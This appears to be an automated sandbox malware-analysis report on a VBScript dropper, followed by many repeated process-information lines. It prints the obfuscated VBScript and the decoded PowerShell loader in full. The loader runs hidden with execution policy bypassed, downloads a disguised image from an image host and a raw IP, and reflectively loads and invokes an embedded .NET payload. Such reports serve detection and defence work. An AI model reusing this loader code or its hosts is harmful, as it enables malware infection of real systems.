Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

VBScript performs obfuscated calls to suspicious functions

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") jipepe = ("$(@(?(@?@?dig@?@? = '") & faraute & "'" jipepe = jipepe & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" jipepe = jipepe & "[??}@*y??}@*" jipepe = jipepe & "t?*(?" jipepe = jipepe & "m.(@(?(@?@?" jipepe = jipepe & "nv?*(?r" jipepe = jipepe & "t]:" jipepe = jipepe & ":Fr@?@?" jipepe = jipepe & "mba??}@*" jipepe = jipepe & "?*(?64??}@*tring( $(@(?(" jipepe = jipepe & "@?@?d" jipepe = jipepe & "ig@?@?.r?*(?" jipepe = jipepe & "@%*:&la" jipepe = jipepe & "(@(?(?*(?('" jipepe = jipepe & "DgTr?*(?" jipepe = jipepe & "','" jipepe = jipepe & "A" jipepe = jipepe & "') ))" jipepe = jipepe & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" jipepe = Replace(jipepe,"@%*:&","p") jipepe = Replace(jipepe,"(@(?(","c") jipepe = Replace(jipepe,"?*(?","e") jipepe = Replace(jipepe,"@?@?","o") jipepe = Replace(jipepe,"??}@*","s") cupuim1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " cupuim1 = Replace(cupuim1,"(@(?(","c") cupuim1 = Replace(cupuim1,"??}@*","s") cupuim1 = Replace(cupuim1,"@?@?","o") cupuim1 = Replace(cupuim1,"@%*:&","p") cupuim = cupuim1 & """" & jipepe & """" Cama.Run cupuim, 0, False IWinHttpRequest.Open("GET", "http://paste.ee/d/SDfNF", "false");IWinHttpRequest.Send();IWinHttpRequest.ResponseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvD

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FFD347A00BD pushad ; iretd

2_2_00007FFD347A00C1

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
